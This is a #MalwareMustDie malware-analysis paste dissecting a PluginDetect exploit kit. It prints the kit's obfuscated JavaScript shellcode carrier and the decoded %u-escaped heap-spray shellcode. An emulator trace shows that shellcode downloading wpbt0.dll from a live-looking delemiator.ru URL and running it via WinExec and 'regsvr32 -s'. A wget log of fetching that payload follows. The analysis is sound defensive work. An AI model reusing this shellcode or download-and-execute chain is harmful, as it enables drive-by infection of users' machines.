
#MalwareMustDie FLUSH4 - PluginDetect 0.7.9. Nov 25, 2012

Nov 25th, 2012
  1. =======================================
  2. #MalwareMustDie - @unixfreaxjp ~]$ date
  3. Sun Nov 25 20:58:35 JST 2012
  4.  
  5. GET THE EXE PAYLOAD via SHELLCODE
  6. =======================================
  7. // The shellcode carrier was detected as well; here is the function exactly as it
  8. // shipped in the kit ("armed & loaded"), reproduced below for analysis only.
  9.  function getShellCode()
  10.  {
// Obfuscated shellcode carrier. The literal in `a` is stored character-reversed, so the
// "%!" separator shows up here as "!%"; split/reverse/join restores the original
// "%!XXXX%!XXXX..." string (dumped further below). The literal is a pasted dump that is
// wrapped across two lines with a gutter number, so this block as shown is not runnable
// JS and is kept purely as evidence.
  11.    var a="8200!%5482!%4451!%e015!%51d5!%c4c5!%34e0!%5191!%e0e5!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%74d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%85e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%d521!%60a5!%74a5!%94c5!%5414!%44d4!%c4d4!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9eb0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%
  12.   1414!%".split("").reverse().join("");
// Final kit step, deliberately left commented out by the analyst so this function never
// yields ready-to-spray shellcode: it swaps the "%!" marker for "%u", producing the
// standard %uXXXX-escaped form. Two things worth noting for anyone reproducing this:
//  - str_replace is a PHP name, not JS; presumably shorthand for a.replace(/%!/g, "%u").
//  - (window.document) ? "%!" : "" is an environment check: outside a browser DOM the
//    search string is empty, the replace is a no-op, and the shellcode stays unusable —
//    a cheap way to defeat non-browser JS unpackers.
//   return str_replace((window.document)?"%!":"", "%u", a) // I commented this on purpose...
  14.  }
  15.  
  16. // Dumping var a after reverse() gives the string below — still carrying the "%!" marker in place of "%u":
  17.  
  18. %!4141%!4141%!8366%!fce4%!ebfc%!5810%!c931%!8166%!0be9%!80fe%!2830%!e240%!ebfa%!e805%!ffeb%!ffff%!ccad%!1c5d%!77c1%!e81b%!a34c%!1868%!68a3%!a324%!3458%!a37e%!205e%!f31b%!a34e%!1476%!5c2b%!041b%!c6a9%!383d%!d7d7%!a390%!1868%!6eeb%!2e11%!d35d%!1caf%!ad0c%!5dcc%!c179%!64c3%!7e79%!5da3%!a314%!1d5c%!2b50%!7edd%!5ea3%!2b08%!1bdd%!61e1%!d469%!2b85%!1bed%!27f3%!3896%!da10%!205c%!e3e9%!2b25%!68f2%!d9c3%!3713%!ce5d%!a376%!0c76%!f52b%!a34e%!6324%!6ea5%!d7c4%!0c7c%!a324%!2bf0%!a3f5%!a32c%!ed2b%!7683%!eb71%!7bc3%!a385%!0840%!55a8%!1b24%!2b5c%!c3be%!a3db%!2040%!dfa3%!2d42%!c071%!d7b0%!d7d7%!d1ca%!28c0%!2828%!7028%!4278%!4068%!28d7%!2828%!ab78%!31e8%!7d78%!c4a3%!76a3%!ab38%!2deb%!cbd7%!4740%!2846%!4028%!5a5d%!4544%!d77c%!ab3e%!20ec%!c0a3%!49c0%!d7d7%!c3d7%!c32a%!a95a%!2cc4%!2829%!a528%!0c74%!ef24%!0c2c%!4d5a%!5b4f%!6cef%!2c0c%!5a5e%!1a1b%!6cef%!200c%!0508%!085b%!407b%!28d0%!2828%!7ed7%!a324%!1bc0%!79e1%!6cef%!2835%!585f%!5c4a%!6cef%!2d35%!4c06%!4444%!6cee%!2135%!7128%!e9a2%!182c%!6ca0%!2c35%!7969%!2842%!2842%!7f7b%!2842%!7ed7%!ad3c%!5de8%!423e%!7b28%!7ed7%!422c%!ab28%!24c3%!d77b%!2c7e%!ebab%!c324%!c32a%!6f3b%!17a8%!5d28%!6fd2%!17a8%!5d28%!42ec%!4228%!d7d6%!207e%!b4c0%!d7d6%!a6d7%!2666%!b0c4%!a2d6%!a126%!2947%!1b95%!a2e2%!3373%!6eee%!1e51%!0732%!4058%!5c5c%!1258%!0707%!4d4c%!4d44%!4145%!5c49%!5a47%!5a06%!125d%!1810%!1810%!4e07%!5a47%!455d%!4407%!4641%!5b43%!4b07%!4447%!455d%!0646%!4058%!1758%!4e58%!1b15%!1218%!4619%!1912%!1241%!4119%!1b12%!0e1b%!4d47%!1a15%!125e%!4319%!1912%!1245%!1a1b%!1b12%!121b%!4319%!1912%!1243%!191b%!1912%!1242%!4719%!5e0e%!1915%!0e43%!5c4c%!5d15%!510e%!1544%!2845%!0028
  19.  
  20. // Applying the commented-out str_replace ("%!" -> "%u") turns it into the standard %uXXXX-escaped form used by heap sprays:
  21.  
  22. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0be9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4d4c%u4d44%u4145%u5c49%u5a47%u5a06%u125d%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u4b07%u4447%u455d%u0646%u4058%u1758%u4e58%u1b15%u1218%u4619%u1912%u1241%u4119%u1b12%u0e1b%u4d47%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u5e0e%u1915%u0e43%u5c4c%u5d15%u510e%u1544%u2845%u0028
  23.  
  24. // Alternatively, strip the "%!" separators to get the raw hex of the shellcode. Caveat: each %uXXXX unit is a 16-bit little-endian value, so swap the two bytes within every group (%u8366 -> 66 83, %ufce4 -> e4 fc) before disassembling or feeding it to an emulator.
  25.  
  26. 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
  27.  
  28. // Running the decoded shellcode through an emulator gives the API-call trace below: a plain URL downloader.
  29.  
  30. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  31. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  32. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  33. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://delemiator.ru:8080/forum/links/column.php?pf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&v=1k&dt=u&yl=m, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  34. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)   
  35. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)   
  36. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  37.  
  38. // As usual it fetches the payload into %TEMP% as wpbt0.dll and launches it twice — directly via WinExec and via "regsvr32 -s" (silent DLL registration) — covering both an EXE-style and a DLL-style payload. The download URL is the IOC to block; fetch it only from an isolated analysis host and never execute the file:
  39.  
  40. http://delemiator.ru:8080/forum/links/column.php?pf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&v=1k&dt=u&yl=m
  41.  
  42. --19:14:57--  http://delemiator.ru:8080/forum/links/column.php?pf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&v=1k&dt=u&yl=m
  43.            => `column.php@pf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&v=1k&dt=u&yl=m'
  44. Resolving delemiator.ru... 203.80.16.81, 208.87.243.131, 202.180.221.186
  45. Connecting to delemiator.ru|203.80.16.81|:8080... connected.
  46. HTTP request sent, awaiting response... 200 OK
  47. Length: 92,672 (91K) [application/x-msdownload]
  48. 19:15:00 (106.41 KB/s) - `column.php@pf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&v=1k&dt=u&yl=m' saved [92672/92672]
  49.  
  50. ---
  51. #MalwareMustDie
  52. We fired your Exploit Kits...